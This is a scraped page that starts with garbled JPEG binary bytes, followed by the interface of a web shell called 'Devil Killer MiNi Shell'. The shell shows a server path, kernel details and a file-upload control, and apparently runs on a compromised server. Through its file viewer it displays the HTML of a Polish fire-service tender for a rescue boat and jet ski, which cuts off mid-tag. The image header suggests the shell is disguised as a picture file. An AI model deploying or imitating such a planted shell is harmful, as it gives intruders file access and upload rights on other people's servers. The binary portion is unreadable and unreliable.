JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250829/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250829/0039868501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa łodzi ratowniczej typu RIB wraz z przyczepą<br/>oraz dostawa skutera ratowniczego wraz z przyczepą i platformą” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Miejska Państwowej Straży Pożarnej w Gdańsku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191123504</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Beniowskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-382</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(58) 769-05-01</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kmpsp.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/kmpsp-gdansk</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa łodzi ratowniczej typu RIB wraz z przyczepą<br/>oraz dostawa skutera ratowniczego wraz z przyczepą i platformą” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f1d36b80-8e56-4e3f-9b9e-9ab821668f19</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00398685</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00180846/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa łodzi ratowniczej typu RIB wraz z przyczepą oraz dostawa skutera ratowniczego wraz z przyczepą i platformą</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f1d36b80-8e56-4e3f-9b9e-9ab821668f19 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami w postępowaniu o udzieleniu zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a<br/>Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. <br/>2. Postępowanie prowadzone jest w języku polskim, w formie elektronicznej, za pośrednictwem platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl, adres strony prowadzonego postępowania: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-f1d36b80-8e56-4e3f-9b9e-9ab821668f19</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia. 2. Wykonawca zamierzający wziąć udział w postęp. o udzielenie<br/>zam. publ. musi posiadać konto podmiotu „Wykonawca” na Platformie. 3. Sposób sporządzenia dokum. elektr. lub dokum.elektr.<br/>będących kopią elektr. treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi<br/>w rozp. Prezesa Rady Ministrów w/s wymagań dla dokum. elektr. 4. Dokum. elektr., o których mowa w § 2 ust. 1 rozp. Prezesa Rady<br/>Ministrów w/s wymagań dla dokum. elektr., sporządza się w postaci elektr., w formatach danych określonych w przepisach<br/>rozp.Rady Ministrów w/sp Krajowych Ram Interoperacyjności, z uwzględn. rodzaju przekazywanych danych i przekazuje się jako<br/>załączniki. 5. Inform., oświad. lub dokumenty, inne niż wymienione w § 2 ust. 1 rozp. Prezesa Rady Ministrów w/s wymagań dla<br/>dokum. elektr., przekazywane w postęp. sporządza się w postaci elektr.: w formatach danych określonych w przepisach rozp. Rady<br/>Ministrów w/s Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub jako tekst wpisany bezpośrednio do<br/>wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej. 6. Jeżeli dokum. elektr., przekazywane przy użyciu<br/>środków komunikacji elektr. zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia<br/>16.04. 93 r. o zwalczaniu nieuczciwej konkurencji , wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/>wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę<br/>przedsiębiorstwa”. 7. Komunikacja w postęp. z wyłączeniem składania ofert, odbywa się drogą elektr. za pośrednictwem formularzy<br/>do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). 8. W przypadku<br/>załączników, które są zgodnie z ustawą Pzp lub rozporz. Prezesa Rady Ministrów w/s wymagań dla dokum. elektr.opatrzone<br/>kwalifik.podpisem elektr., podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem<br/>wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu<br/>zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio<br/>podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ<br/>wewnętrzny). 9. Możliwość korzystania w postęp. z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji” służących do zadawania pytań dot. treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia. 10. Wszystkie wysłane i odebrane w postęp. przez wykonawcę wiadomości widoczne<br/>są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. 11. Maksym. rozmiar plików przesyłanych za pośredn.<br/>„Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). 12.<br/>Minim. wymagania techniczne dot. sprzętu używanego w celu korzystania z usług Platformy oraz informacje dot. specyfikacji<br/>połączenia określa Regulamin Platformy e-Zamówienia. 13. W uzasadnionych przypadkach uniemożliwiających komunikację<br/>Wykonawcy i Zamawiającego za pośrednictwem Platformy, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej<br/>na adres e-mail: sekretariat.przetargi@kmpsp.gda.pl (nie dotyczy składania ofert).<br/>3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. Parlamentu Europejskiego i Rady (UE) 2016/679 informujemy, że:<br/>1)	administratorem danych osobowych, które mogą zostać przekazane Zamawiającemu w toku niniejszego postępowania jest Komendant Miejski Państwowej Straży Pożarnej w Gdańsku, ul. Beniowskiego 7, 80-382 Gdańsk;<br/>2)	kontakt do inspektora ochrony danych osobowych w Komendzie Miejskiej Państwowej Straży Pożarnej w Gdańsku: adres e-mail iod@straz.gda.pl, telefon 58 347 78 93;<br/>3)	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b RODO w celu związanym z niniejszym postępowaniem prowadzonym w trybie podstawowym w procedurze wyboru Wykonawcy i dalej w związku z realizowaną umową;<br/>4)	odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy obowiązującego prawa, w tym w szczególności przepisy ustawy z 6 września 2001 r. o dostępie do informacji publicznej (t.j .Dz.U. z 2022 r., poz. 902);<br/>5)	dane osobowe będą przechowywane do czasu potrzebnego na realizację i rozliczenie umowy oraz niezbędnego do przedawnienia ewentualnych roszczeń;<br/>6)	podanie danych osobowych jest dobrowolne w celu zawarcia i wykonywania umowy łączącej Zamawiającego z Wykonawcą w ramach niniejszego postępowania prowadzonego w trybie podstawowym, aczkolwiek odmowa ich podania uniemożliwi podjęcie współpracy pomiędzy ww. stronami;<br/>7)	w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	osoby, których dane osobowe zostaną przekazane Zamawiającemu w toku niniejszego postępowania posiadają:<br/>a)	prawo dostępu do danych osobowych ich dotyczących;<br/>b)	prawo do sprostowania danych osobowych ich dotyczących*;<br/>c)	usunięcia danych osobowych ich dotyczących, w sytuacjach określonych w art. 17 ust. 1 RODO z zastrzeżeniem art. 17 ust. 3 RODO;<br/>d)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>e)	prawo wniesienia sprzeciwu wobec przetwarzania danych osobowych ich dotyczących;<br/>- o ile żądania nie są ewidentnie nieuzasadnione lub nadmierne oraz nie ograniczają ich, bądź wykluczają inne przepisy;<br/>9)	osoby, których dane osobowe zostaną przekazane Zamawiającemu w toku niniejszego postępowania posiadają prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy którakolwiek z tych osób uzna, że przetwarzanie danych osobowych ich dotyczących narusza przepisy RODO.<br/>2. W zakresie wypełniania obowiązków informacyjnych przewidzianych w art. 13 RODO, Wykonawca składa oświadczenie zawarte w Formularzu oferty.<br/><br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w zakresie niezgodnym z warunkami zamówienia oraz nie może naruszać integralności protokołu postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PT.2370.II.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 zamówienia pn.: „Dostawa łodzi ratowniczej typu RIB wraz z przyczepą”.<br/>2.	Szczegółowe wymagania dotyczące minimalnych parametrów i sposobu wykonania poszczególnych części przedmiotu zamówienia zostały szczegółowo opisane w załącznikach nr 2.1 do SWZ - Opis przedmiotu zamówienia. Pozostałe warunki realizacji zamówienia zostały określone w projektowanych postanowieniach umowy w sprawie zamówienia publicznego - wzór stanowi załącznik nr 3.1 do SWZ.<br/>4. Wykonawca udzieli bezpłatnej gwarancji na przedmiot zamówienia na okres zaoferowany przez Wykonawcę w ofercie min. 24 miesiące, liczony od daty podpisania przez obydwie strony protokołu odbioru przedmiotu zamówienia (bez zastrzeżeń). Zaoferowany przez Wykonawcę okres gwarancji stanowi jedno z kryteriów oceny ofert.<br/>5. Szkolenia: Dla części Nr 1 zamówienia Wykonawca przeprowadzi nieodpłatny instruktaż z obsługi przedmiotu zamówienia dla min. 10 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34521400-9 - Łodzie ratunkowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34521000-5 - Łodzie specjalistyczne</p> <p class="mb-0">34223000-6 - Przyczepy i naczepy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający przyjmie do szczegółowego rozpatrywania oferty niepodlegające odrzuceniu. <br/>2.	Stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie każdego kryterium.<br/>3.	Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną punktację: punktacja 0-100 (100% = 100 pkt). Zamawiający zastosuje zaokrąglenie wszystkich wyników do dwóch miejsc po przecinku.<br/>4.	Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert:<br/>1)	dla części nr 1 zamówienia:<br/>- Cena brutto - 60 %<br/>- Moc silnika – 20 %<br/>- Gwarancja - 20 %<br/>Ocenie w oparciu o ww. kryteria oceny ofert poddawane są wyłącznie oferty niepodlegające odrzuceniu. Zamawiający udzieli zamówienia Wykonawcy, którego oferta przedstawi najkorzystniejszy bilans kryteriów oceny ofert określony w niniejszym przetargu, wyliczonych zgodnie ze wzorem:<br/>Lp = Lc + Lmc + Lg <br/>gdzie:<br/>Lp - łączna ilość punktów przyznanych ofercie<br/>Lc - ilość punktów przyznana badanej ofercie za kryterium „cena”<br/>Lmc - ilość punktów przyznana badanej ofercie za kryterium „moc silnika”<br/>Lg - ilość punktów przyznana badanej ofercie za kryterium „gwarancja”<br/><br/>1) Punktacja za kryterium „Cena” – 60%, będzie wyliczana wg poniższego wzoru. Maksymalna liczba punktów przyznanych Wykonawcy wynosi 60.<br/>Lc = Cn/Cbad x 60<br/>gdzie: <br/>Lc - ilość punktów oferty badanej w kryterium cena<br/>Cn - najniższa cena (brutto) spośród złożonych ofert<br/>Cbad - cena (brutto) w ofercie badanej<br/>2)	Punktacja za kryterium „Moc silnika” 20%, będzie wyliczana wg zasady: <br/>Ocena punktowa zostanie obliczona wg wzoru: <br/>0 pkt - jeżeli wykonawca zaoferuje moc silnika min. 160 KM do 190 KM włącznie<br/>10 pkt - jeżeli wykonawca zaoferuje moc silnika od 221 KM do 260 KM włącznie<br/>20 pkt - jeżeli wykonawca zaoferuje moc silnika od 191 KM do 220 KM włącznie<br/>W przypadku niepodania w formularzu oferty mocy silnika lub podania mocy silnika wynoszącej więcej niż 260 KM lub mniej niż 160 KM jego oferta zostanie odrzucona. <br/>3) Punktacja za kryterium „Gwarancja”, będzie wyliczana wg zasady: <br/>0 pkt - za udzielenie gwarancji, rękojmi na minimalny okres 24 miesięcy, <br/>10 pkt - za udzielenie gwarancji, rękojmi na okres 36 miesięcy, <br/>20 pkt - za udzielenie gwarancji, rękojmi na okres 48 miesięcy. <br/>Minimalny okres gwarancji i rękojmi wynosi 24 miesiące od daty odbioru. W formularzu oferty należy podać oferowany okres gwarancji, rękojmi. W przypadku braku wskazania okresu gwarancji, rękojmi w formularzu oferty, Zamawiający przyjmie do oceny okres 24 miesięcy przyznając Wykonawcy 0 pkt. W przypadku zaoferowania gwarancji i rękojmi dłuższej niż 48 miesięcy Zamawiający przyzna w ramach tego kryterium 20 pkt., ale do umowy zostanie wpisana zaoferowana długość gwarancji i rękojmi.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Moc silnika</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć nr 2 zamówienia: „Dostawa skutera ratowniczego wraz z przyczepą i platformą”.<br/>1. Szczegółowe wymagania dotyczące minimalnych parametrów i sposobu wykonania poszczególnych części przedmiotu zamówienia zostały szczegółowo opisane w załącznikach nr 2.2 do SWZ - Opis przedmiotu zamówienia. <br/>2. Pozostałe warunki realizacji zamówienia zostały określone w projektowanych postanowieniach umowy w sprawie zamówienia publicznego - wzór stanowi załącznik nr 3.2 do SWZ.<br/>3. Wykonawca udzieli bezpłatnej gwarancji na przedmiot zamówienia na okres zaoferowany przez Wykonawcę w ofercie min. 24 miesiące, liczony od daty podpisania przez obydwie strony protokołu odbioru przedmiotu zamówienia (bez zastrzeżeń). Zaoferowany przez Wykonawcę okres gwarancji stanowi jedno z kryteriów oceny ofert.<br/>4. Szkolenie - Dla części Nr 2 zamówienia:<br/>1.1)	Wykonawca przeprowadzi 3 dniowe szkolenia dla 10 osób z ratownictwa wodnego w zakresie operatora skutera ratowniczego (szkolenie K38):<br/>- szkolenie musi składać się z min. 22 godzin w tym max. 6 godzin zajęć teoretycznych i min.16 godzin praktycznych dla 10 uczestników,<br/>- szkolenie musi się odbywać na min 2 skuterach wodnych przez min. 2 wykwalifikowanych, certyfikowanych operatorów skutera ratowniczego K38,<br/>- każdy uczestnik na koniec szkolenia powinien otrzymać certyfikat potwierdzający uczestnictwo w szkoleniu.<br/>1.2) Wykonawca przeprowadzi nieodpłatny instruktaż z obsługi przedmiotu zamówienia dla min. 10 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34421000-7 - Skutery silnikowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34223000-6 - Przyczepy i naczepy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 